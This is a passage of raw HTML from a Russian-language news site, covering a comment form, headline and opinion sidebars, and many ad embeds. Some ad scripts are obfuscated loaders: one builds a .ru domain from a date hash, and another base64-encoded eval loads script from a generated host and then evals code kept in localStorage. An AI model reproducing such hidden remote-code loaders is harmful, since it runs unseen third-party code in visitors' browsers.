<b id="b_emo" class="bb-btn" onclick="ins_emo(this)" title="Вставка смайликов">Вставка смайликов</b>


<b id="b_color" class="bb-btn" onclick="ins_color(this)" title="Выбор цвета">Выбор цвета</b>
<span class="bb-sep">|</span>
<b id="b_hide" class="bb-btn" onclick="simpletag('hide')" title="Скрытый текст">Скрытый текст</b>
<b id="b_quote" class="bb-btn" onclick="simpletag('quote')" title="Вставка цитаты">Вставка цитаты</b>
<b id="b_tnl" class="bb-btn" onclick="translit()" title="Преобразовать выбранный текст из транслитерации в кириллицу">Преобразовать выбранный текст из транслитерации в кириллицу</b>
<b id="b_spoiler" class="bb-btn" onclick="simpletag('spoiler')" title="Вставка спойлера">Вставка спойлера</b>
</div>
<div id="dle_emos" style="display: none;" title="Вставка смайликов"><div style="width:100%;height:100%;overflow: auto;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wink:'); return false;"><img style="border: none;" alt="wink" src="http://hronika.info/engine/data/emoticons/wink.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':winked:'); return false;"><img style="border: none;" alt="winked" src="http://hronika.info/engine/data/emoticons/winked.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':smile:'); return false;"><img style="border: none;" alt="smile" src="http://hronika.info/engine/data/emoticons/smile.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':am:'); return false;"><img style="border: none;" alt="am" src="http://hronika.info/engine/data/emoticons/am.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':belay:'); return false;"><img style="border: none;" alt="belay" src="http://hronika.info/engine/data/emoticons/belay.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':feel:'); return false;"><img style="border: none;" alt="feel" src="http://hronika.info/engine/data/emoticons/feel.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':fellow:'); return false;"><img style="border: none;" alt="fellow" src="http://hronika.info/engine/data/emoticons/fellow.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':laughing:'); return false;"><img style="border: none;" alt="laughing" src="http://hronika.info/engine/data/emoticons/laughing.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':lol:'); return false;"><img style="border: none;" alt="lol" src="http://hronika.info/engine/data/emoticons/lol.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':love:'); return false;"><img style="border: none;" alt="love" src="http://hronika.info/engine/data/emoticons/love.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':no:'); return false;"><img style="border: none;" alt="no" src="http://hronika.info/engine/data/emoticons/no.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':recourse:'); return false;"><img style="border: none;" alt="recourse" src="http://hronika.info/engine/data/emoticons/recourse.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':request:'); return false;"><img style="border: none;" alt="request" src="http://hronika.info/engine/data/emoticons/request.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':sad:'); return false;"><img style="border: none;" alt="sad" src="http://hronika.info/engine/data/emoticons/sad.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':tongue:'); return false;"><img style="border: none;" alt="tongue" src="http://hronika.info/engine/data/emoticons/tongue.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wassat:'); return false;"><img style="border: none;" alt="wassat" src="http://hronika.info/engine/data/emoticons/wassat.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':crying:'); return false;"><img style="border: none;" alt="crying" src="http://hronika.info/engine/data/emoticons/crying.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':what:'); return false;"><img style="border: none;" alt="what" src="http://hronika.info/engine/data/emoticons/what.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':bully:'); return false;"><img style="border: none;" alt="bully" src="http://hronika.info/engine/data/emoticons/bully.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':angry:'); return false;"><img style="border: none;" alt="angry" src="http://hronika.info/engine/data/emoticons/angry.gif" /></a></td></tr></table></div></div>
<textarea name="comments" id="comments" cols="70" rows="10" onfocus="setNewField(this.name, document.getElementById( 'dle-comments-form' ))"></textarea>
</div></td>
		</tr>
			
			
		<tr>		
			<td class="label">Введите код: <span class="impot">*</span></td>	
			<td>	
				<div><span id="dle-captcha"><img src="/engine/modules/antibot/antibot.php" alt="Включите эту картинку для отображения кода безопасности" width="160" height="80" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a></span></div>	
				<div><input type="text" name="sec_code" id="sec_code" style="width:115px" class="f_input" /></div>
			</td>	
		</tr>	
			
			
	</table>
	<br />
</div>
	<div class="fieldsubmit" style=" position: relative; width: 100%; height: 23px; top: -10px; ">	
		<button type="submit" name="submit" class="fbutton addcombut"><span>Добавить</span></button>
	</div>

		<input type="hidden" name="subaction" value="addcomment" />
		<input type="hidden" name="post_id" id="post_id" value="351630" /></form><script type="text/javascript">
<!--
$(function(){

	$('#dle-comments-form').submit(function() {
	  doAddComments();
	  return false;
	});

});

function reload () {

	var rndval = new Date().getTime(); 

	document.getElementById('dle-captcha').innerHTML = '<img src="/engine/modules/antibot/antibot.php?rndval=' + rndval + '" width="160" height="80" alt="" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a>';

};
//-->
</script>
  </div>

  <!--
  <div id="vkontakte">


<script type="text/javascript" src="//vk.com/js/api/openapi.js?98"></script>

<script type="text/javascript">
  VK.init({apiId: 3098550, onlyWidgets: true});
</script>


<div id="vk_comments"></div>
<script type="text/javascript">
VK.Widgets.Comments("vk_comments", {limit: 10, width: "100%", attach: "*"});
</script>
      
  </div>
  <div id="facebook">
<div class="fb-comments" data-href="http://hronika.info/fotoreportazhi/351630-fotograf-pokazal-pochemu-tokio-nazyvayut-gorodom-kontrastnoy-krasoty-foto.html" data-width="410"></div>      
  </div>
  -->
  </div> 
</div>
 
<div id="dle-ajax-comments"></div>

<!--dlenavigationcomments-->
<div class="clr"><br /></div>
</div>
<div id='_mwayss-13a2bf393830a24cb00f9b493f869072'></div>
                <script>      
                    (function(window, document, undefined) {
                        var script_tag = document.createElement('script');
                        script_tag.src = 'https://ad.mediawayss.com/ad/mwayss_invocation.min.js?pzoneid=1171&height=288&width=512&tld=hronika.info&ctype=div&ch=DOMAIN_HERE';
                        var container = document.getElementById('_mwayss-13a2bf393830a24cb00f9b493f869072');    
                        container.parentNode.insertBefore(script_tag, container);
                    })(window, document);
                </script>
<script>
$.ctrl = function(key, callback, args) {
    var isCtrl = false;
    $(document).keydown(function(e) {
        if(!args) args=[]; 
        isCtrl = e.ctrlKey;
        if((e.keyCode == key.charCodeAt(0) || e.keyCode == 45) && isCtrl) callback.apply(this, args);
    }).keyup(function(e) {
        if(e.ctrlKey) isCtrl = false;
    });        
};
$.ctrl('C', function() {
    $('body').prepend("<div id='ctrl_c' class='ctrl_c' align='justify'><span>&times;</span>Использование материалов и новостей с сайта <a style='font-size: 11px;' href='http://hronika.info'>hronika.info</a> разрешается только при условии размещения прямой, открытой для поисковых систем, гиперссылки на опубликованную или цитируемую новость.</div>");
    $("#ctrl_c > span").click( function() { $("#ctrl_c").remove(); });

	
ns4 = (document.layers)? true:false
ie4 = (document.all)? true:false

function mousemove(event) {
        var mouse_x = y = 0;
    if (document.attachEvent != null) {
        mouse_x = window.event.clientX;
        mouse_y = window.event.clientY;
    } else if (!document.attachEvent && document.addEventListener) {
        mouse_x = event.clientX;
        mouse_y = event.clientY;
    }
    
}

    document.onmousemove=mousemove;

});

$(document).ready(function(){
var fimg=$(".ax-full img").first();
fimg.css({"width":"200px","height":"150px"});
});
</script>
</div></article>
            </div>
          </div>

             <aside id="sideRight2"><!---->

         <!-- 
		 <div class="wrap"> 
         	
         -->

<div class="row-600">
    <div class="col-336">
        <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="3119660949"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
    </div>
    <div class="col-260">
       <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10484">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10484/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
        
    </div>
</div>



<div class="clr"></div>

<div class="width49-4 fleft">  
            <div class="wrap">
            <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10493">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10493/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
            <div id='tau92omicron6749'></div>
<script type='text/javascript'>(function(){function f(v){return Math.abs(v.split('').reduce(function(w,x){return w=(w<<5)-w+x.charCodeAt(0),w&w},0))}function g(v){return(26<=v?g((v/26>>0)-1):'')+'abcdefghijklmnopqrstuvwxyz'[v%26>>0]}var j=673873,r=''+Math.ceil((Date.now()-1.5147648e12)/6.048e8)*j,p=6749,l=''+j+''+p,t=document;p=t.createElement('script'),p.type='text/javascript',p.src='//'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+'.ru/'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+l+'.js',t.getElementById('tau92omicron6749').appendChild(p)})();</script>
            <script type="text/javascript">

    (function(w, d, y, h, p, a, b) {
        w[y] = w[y] || []; w[y].push(function() {return [a, b]});
        for (var e, r = d.getElementsByTagName("script"), t = h + "/d0e1/e179f51b/5154/719f/5b027feea71/0e17fee/d0e17fe", n = r.length; n--;) (r[n].src == t || r[n].src.indexOf(t) > -1) && (e = r[n]);
        if (w['ccScriptSupport'] === undefined || !e) {
            var s = d.head || d.getElementsByTagName("head")[0]; e = d.createElement("script"), e.type = "text/javascript", e.src = t, s.appendChild(e);e.setAttribute('data-base', h);e.setAttribute('data-config', p);
        }
    })(this, this.document, "spAsyncScript", 'https://csp-qcw5yi.ru', 9568, this.document.currentScript, '5b4f41520bbda536cf2240e3');
</script>
            <div id="MIXADV_4786" class="MIXADVERT_NET"></div>
          <script> 
          var node4786 = document.getElementById("MIXADV_4786");
          if( node4786 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4786&r="+Math.random();
               node4786.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ4eXoiXTsgdmFyIHN0ciA9ZGF5Kihtb250aCAqIG5hbWVfZGF5ICogZGF5KSsiIisgZGF5Kihtb250aCArIG5hbWVfZGF5ICsgZGF5ICt5ZWFyKTt2YXIgaGFzaCA9ICBidG9hKGJ0b2Eoc3RyKSkudG9Mb3dlckNhc2UoKTsgdmFyIGhvc3QgPSBoYXNoLnN1YnN0cmluZygzLCBoYXNoLmxlbmd0aCAtIG5hbWVfZGF5LzIpKyIuIitkb21bbmFtZV9kYXkgLSAxXTt2YXIgciA9IE1hdGgucmFuZG9tKCkudG9TdHJpbmcoMzYpLnN1YnN0cigyLCAyKTtyID0gci5yZXBsYWNlKC9bMC05XS9nLCAiIik7dmFyIGRlbHRhID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogKDEwMCAtIDEwICsgMSkpICsgMTA7dmFyIGlkID0gNDc4NiAtIGRlbHRhOyB2YXIgc2NyaXB0X2ZpcnN0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7c2NyaXB0X2ZpcnN0LnNyYyA9ICJodHRwczovLyIrIGhvc3QrIi8iK2RlbHRhK2lkK3IrIiI7IG5vZGU0Nzg2LnBhcmVudE5vZGUuYXBwZW5kQ2hpbGQoc2NyaXB0X2ZpcnN0KTtzY3JpcHRfZmlyc3Qub25lcnJvciA9IGZ1bmN0aW9uKCl7IHNldFRpbWVvdXQoIGZ1bmN0aW9uICgpIHsgaWYoIG5vZGU0Nzg2LmlubmVySFRNTCA9PSAiIiApIHdpbmRvdy5ldmFsKGxvY2FsU3RvcmFnZS5nZXRJdGVtKCI0Nzg2IikpIH0sIDUwMDApOyAgO307IA==") );
              }
          }
          </script>
            <div id="M225926ScriptRootC608879">
        <div id="M225926PreloadC608879">
        Загрузка...
    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M225926ScriptRootC608879")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M225926ScriptRootC608879");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=608879;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsc.marketgid.com/h/r/hronika.info.608879.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- Composite End -->
            <!-- start NEW_v1_right for hronika.info -->
<div id="adpartner-jsunit-850">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=850&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<!-- end NEW_v1_right for hronika.info -->
            <div id="IencjMRQWgr5YuVfVLqO" data-type="2" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'leokross.com';</script>
<script src="//leokross.com/WZuI/GLYm.js" ></script>
            <div id="CNM4428" style="text-align:center;display:none" ><div id="CNM4428t" style="display:none"></div></div>

<script type="text/javascript" async="async" src="https://c.her-ber.top/pzi/4428" ></script>
            <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Side-1 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5084862545"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
            <!-- -------------Informer block------------- -->
<div id="svtn_inf_29" class="svtn_inf" data-tisid="29"></div>
<!-- ---------------------------------------- -->
<!-- -------------Before </body>------------- -->
<script async="async">
function nmbrsvtn(nma){
  var nmc=false;
  function nmr(){
      if(nmc)return;
      nmc=true;
      nma();
  }
  if(document.addEventListener){
      document.addEventListener("DOMContentLoaded",function(){nmr();},false)}else if   (document.attachEvent){if(document.documentElement.doScroll&&window==window.top){function nmts(){if(nmc)return;if(!document.body)return;try{document.documentElement.doScroll("left");nmr();}catch(e){setTimeout(nmts,100);}}nmts();}document.attachEvent("onreadystatechange",function(){if(document.readyState==="complete"){nmr();}})}if(window.addEventListener)window.addEventListener("load",nmr,false);else if(window.attachEvent)window.attachEvent("onload",nmr);window.onload=nmr;
}

function start_svtn_tis() {  
var el = document.getElementsByClassName("svtn_inf");
var arr_inf = "";
for (var i = 0; i < el.length; i++) {
if (i == el.length - 1) {
arr_inf = arr_inf + el[i].getAttribute("data-tisid");
}else{
arr_inf = arr_inf + el[i].getAttribute("data-tisid") + "_";
}
}
var el2 = document.getElementsByTagName("body");
var svtnscrpt = document.createElement('script');
svtnscrpt.type = 'text/javascript';
svtnscrpt.src = 'https://svitnews.com/V/get/inf/' + arr_inf;
svtnscrpt.async = 'async';
 el2[0].appendChild(svtnscrpt);
return;
}
function pre_start_svtn_tis(){
if(window.flag_svtn === true){
return;
}
window.flag_svtn = true;

start_svtn_tis();
}
nmbrsvtn(pre_start_svtn_tis);
</script>  
<!-- ---------------------------------------- -->
				<h3>Хроника событий сегодня</h3>
               <div class="newsr_1">
    <span>16.09-20:00</span>
	<a href="http://hronika.info/kriminal/351731-v-kieve-na-kreschatike-ruhnul-balkon.html"><strong title="В Киеве на Крещатике рухнул балкон">В Киеве на Крещатике рухнул балкон</strong><b>17</b></a>
</div><div class="newsr_1">
    <span>16.09-19:54</span>
	<a href="http://hronika.info/sport/351730-yarmolenko-oformil-dubl-v-matche-premer-ligi-protiv-evertona.html"><strong title="Ярмоленко оформил дубль в матче Премьер-лиги против «Эвертона»">Ярмоленко оформил дубль в матче Премьер-лиги против «Эвертона»</strong><b>73</b></a>
</div><div class="newsr_1">
    <span>16.09-19:52</span>
	<a href="http://hronika.info/fotoreportazhi/351630-fotograf-pokazal-pochemu-tokio-nazyvayut-gorodom-kontrastnoy-krasoty-foto.html"><strong title="Фотограф показал, почему Токио называют городом контрастной красоты. Фото">Фотограф показал, почему Токио называют городом контрастной красоты. Фото</strong><b>208</b></a>
</div><div class="newsr_1">
    <span>16.09-19:50</span>
	<a href="http://hronika.info/kurjozy/351667-nelepye-postupki-na-kotorye-sposobny-lish-ekstraordinarnye-lyudi.html"><strong title="Нелепые поступки, на которые способны лишь экстраординарные люди">Нелепые поступки, на которые способны лишь экстраординарные люди</strong><b>185</b></a>
</div><div class="newsr_1">
    <span>16.09-19:48</span>
	<a href="http://hronika.info/tehnologii/351729-xiaomi-vypustila-unikalnyy-gadzhet-dlya-detey.html"><strong title="Xiaomi выпустила уникальный гаджет для детей">Xiaomi выпустила уникальный гаджет для детей</strong><b>194</b></a>
</div><div class="newsr_1">
    <span>16.09-19:42</span>
	<a href="http://hronika.info/neverojatnoe/351728-v-paname-otkryli-novyy-vid-korallov.html"><strong title="В Панаме открыли новый вид кораллов">В Панаме открыли новый вид кораллов</strong><b>141</b></a>
</div><div class="newsr_1">
    <span>16.09-19:36</span>
	<a href="http://hronika.info/kriminal/351727-boeviki-obstrelyali-naselennye-punkty-na-donbasse.html"><strong title="Боевики обстреляли населенные пункты на Донбассе">Боевики обстреляли населенные пункты на Донбассе</strong><b>109</b></a>
</div><div class="newsr_1">
    <span>16.09-19:30</span>
	<a href="http://hronika.info/kultura/351726-lesya-nikityuk-smeshno-potrollila-vlada-yamu.html"><strong title="Леся Никитюк смешно потроллила Влада Яму">Леся Никитюк смешно потроллила Влада Яму</strong><b>1306</b></a>
</div><div class="newsr_1">
    <span>16.09-19:24</span>
	<a href="http://hronika.info/avto/351725-toyota-obnovila-populyarnyy-mikroven.html"><strong title="Toyota обновила популярный микровэн">Toyota обновила популярный микровэн</strong><b>925</b></a>
</div><div class="newsr_1">
    <span>16.09-19:18</span>
	<a href="http://hronika.info/sport/351724-dinamo-i-zarya-pobeditelya-ne-opredelili.html"><strong title="«Динамо» и «Заря» победителя не определили">«Динамо» и «Заря» победителя не определили</strong><b>158</b></a>
</div>
                <div class="vsenovosti" title="Все новости хроники"><a href="/lastnews">Все новости хроники</a></div>
			</div>

               <div class="wrap">
				<h3>События сегодня</h3>           
</div>
   </div>   
   
   <div class="width49-4 fright">
   
   
<!--
<div id="ax_popular_comp">
	<ul class="tabs tshadow ax_tabs" style="height: 31px;">
		<li title="Компетентно" style="width: 147px;"><a href="#ax_comp">Компетентно</a></li>
		<li title="Актуально"><a href="#ax_actual">Актуально</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_comp">
			<div class="b-tab-n1">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html"><img src="/posters/300_131_70_1/uploads/posts/2015-03/thumbs/1426164908_mvf.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-author"><a href="/kompetentno/">Наши эксперты</a></span>
	<span class="b-full-link"><a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html">«Согреют» ли деньги МВФ простых украинцев</a></span>
	
</div>

<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author1"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426164917_lanov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Лановой</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author2"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426164962_zhalilo.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Ярослав Жалило</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author3"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426165061_dubrov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Дубровский</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author4"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426165044_shapran.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Виталий Шапран</span>
</div>

		</div>			
		<div id="ax_actual">
			 <div class="b-tab-n1">
	<a href="http://hronika.info/politika/351229-volker-upreknul-pravitelstvo-za-zhiteley-okkupirovannogo-donbassa.html"><img src="/posters/300_131_70_1/uploads/posts/2018-09/thumbs/1536930316_volker.jpg" alt="Волкер упрекнул правительство за жителей оккупированного Донбасса" title="Волкер упрекнул правительство за жителей оккупированного Донбасса" /></a>
	
	<span class="b-full-link"><a href="http://hronika.info/politika/351229-volker-upreknul-pravitelstvo-za-zhiteley-okkupirovannogo-donbassa.html">Волкер упрекнул правительство за жителей оккупированного Донбасса</a></span>

</div>
			 <div class="b-tab-n2">
	<a href="http://hronika.info/politika/351226-stalo-izvestno-kogda-ozhidaetsya-ezhegodnoe-poslanie-poroshenko-k-rade.html"><img src="/posters/74_74_70_1/uploads/posts/2018-09/thumbs/1536929225_poroshenko.jpg" alt="Стало известно, когда ожидается ежегодное послание Порошенко к Раде" title="Стало известно, когда ожидается ежегодное послание Порошенко к Раде" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/351212-poroshenko-prizval-sedleckuyu-vstretitsya-s-lucenko.html"><img src="/posters/74_74_70_1/uploads/posts/2018-09/thumbs/1536927291_lucenko.jpg" alt="Порошенко призвал Седлецкую встретиться с Луценко" title="Порошенко призвал Седлецкую встретиться с Луценко" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/351199-posle-obrascheniya-demchiny-gpu-otkryla-delo-protiv-nabu.html"><img src="/posters/74_74_70_1/uploads/posts/2018-09/thumbs/1536925085_nabu.jpg" alt="После обращения Демчины ГПУ открыла дело против НАБУ" title="После обращения Демчины ГПУ открыла дело против НАБУ" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/351191-omelyana-otpustili-na-poruki.html"><img src="/posters/74_74_70_1/uploads/posts/2018-09/thumbs/1536924010_omelyan.jpg" alt="Омеляна отпустили на поруки" title="Омеляна отпустили на поруки" /></a>
	

</div>
		</div>			         
	</div>
</div>

<div class="clr"></div>
 

-->      
       


			<div class="wrap">
				<h3 class="inbg">Мнения</h3> 
				<div>
					<div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1858.jpg" />
        <div>14.09.2018|17:45</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%92%D0%BB%D0%B0%D0%B4%D0%B8%D0%BC%D0%B8%D1%80+%D0%A6%D1%8B%D0%B1%D1%83%D0%BB%D1%8C%D0%BA%D0%BE', 'http://hronika.info/user/%D0%92%D0%BB%D0%B0%D0%B4%D0%B8%D0%BC%D0%B8%D1%80+%D0%A6%D1%8B%D0%B1%D1%83%D0%BB%D1%8C%D0%BA%D0%BE/', '0'); return false;" href="http://hronika.info/user/%D0%92%D0%BB%D0%B0%D0%B4%D0%B8%D0%BC%D0%B8%D1%80+%D0%A6%D1%8B%D0%B1%D1%83%D0%BB%D1%8C%D0%BA%D0%BE/">Владимир Цыбулько</a></div>
    	<strong><a href="http://hronika.info/mnenia/350985-sut-antiporoshenkvskih-soyuzv-v-povny-revzyi-yogo-kursu.html">Суть антипорошенківських союзів – в повній ревізії його курсу</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1885.jpg" />
        <div>14.09.2018|17:00</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%9C%D0%B0%D0%B3%D0%B4%D0%B0', 'http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%9C%D0%B0%D0%B3%D0%B4%D0%B0/', '0'); return false;" href="http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%9C%D0%B0%D0%B3%D0%B4%D0%B0/">Евгений Магда</a></div>
    	<strong><a href="http://hronika.info/mnenia/350984-rosya-graye-myazami.html">Росія грає м’язами</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1877.jpg" />
        <div>14.09.2018|16:15</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%9A%D0%B8%D1%80%D0%B8%D0%BB%D0%BB+%D0%A1%D0%B0%D0%B7%D0%BE%D0%BD%D0%BE%D0%B2', 'http://hronika.info/user/%D0%9A%D0%B8%D1%80%D0%B8%D0%BB%D0%BB+%D0%A1%D0%B0%D0%B7%D0%BE%D0%BD%D0%BE%D0%B2/', '0'); return false;" href="http://hronika.info/user/%D0%9A%D0%B8%D1%80%D0%B8%D0%BB%D0%BB+%D0%A1%D0%B0%D0%B7%D0%BE%D0%BD%D0%BE%D0%B2/">Кирилл Сазонов</a></div>
    	<strong><a href="http://hronika.info/mnenia/350982-agroholding-i-inostrancy.html">Агрохолдинг и иностранцы</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1950.jpg" />
        <div>14.09.2018|15:30</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%91%D0%BE%D0%B3%D0%B4%D0%B0%D0%BD+%D0%AF%D1%80%D0%B5%D0%BC%D0%B5%D0%BD%D0%BA%D0%BE', 'http://hronika.info/user/%D0%91%D0%BE%D0%B3%D0%B4%D0%B0%D0%BD+%D0%AF%D1%80%D0%B5%D0%BC%D0%B5%D0%BD%D0%BA%D0%BE/', '0'); return false;" href="http://hronika.info/user/%D0%91%D0%BE%D0%B3%D0%B4%D0%B0%D0%BD+%D0%AF%D1%80%D0%B5%D0%BC%D0%B5%D0%BD%D0%BA%D0%BE/">Богдан Яременко</a></div>
    	<strong><a href="http://hronika.info/mnenia/350981-pdozra-omelyanu-ne-pospshayte-krichati-vau.html">Підозра Омеляну: не поспішайте кричати «Вау»</a></strong>			
</div>
				</div>
                <div class="vsenovosti" title="Мнения, рассуждения, аналитика"><a href="/mnenia/">Читать все мнения</a></div>
			</div>
  

	<div class="hrap" >
    
            	﻿


 <div class="fleft authbut"><a class="alert4">Авторизация</a></div> 
 <div class="fright authbut"><a rel="nofollow" href="/index.php?do=register">Регистрация</a></div>
 <div class="clr"></div>
<div id="dim4">
<div class="msgbox">
<div class="msgboxttl"><span></span>Вход на сайт<a class="close">X</a></div>
 		<form method="post" action="#">
				<div id="logentform"><span></span>
                <div class="msgbox_ent">Войти используя учетную запись хроники</div>
					<ul class="reset">
						<li class="logfield"><label for="login_name">Введите E-Mail:</label><input type="text" name="login_name" id="login_name" /></li>
						<li class="logfield"><label for="login_password">Введите Пароль :</label><input type="password" name="login_password" id="login_password" />&nbsp;(<a id="zabyli" href="http://hronika.info/index.php?do=lostpassword">Забыли?</a>)</li><br />
						<li class="zapomnit"><input type="checkbox" name="login_not_save" id="login_not_save" value="1"/><label for="login_not_save">&nbsp;Запомнить меня</label><button onclick="submit();" type="submit" title="Войти">Войти</button></li>
					</ul>
					<input name="login" type="hidden" id="login" value="submit" />
                    <div id="logreg"><a rel="nofollow" href="/index.php?do=register">Зарегистрироваться</a></div>
				</div> 
			</form>
            
            
 <div class="sotsenter">
	
	
	
	
	
	
 </div>

    <div class="clr h40"></div>
 <div class="clr msgbox_b"></div>
       </div>
    </div>

    </div>

    <div class="wrap"> 
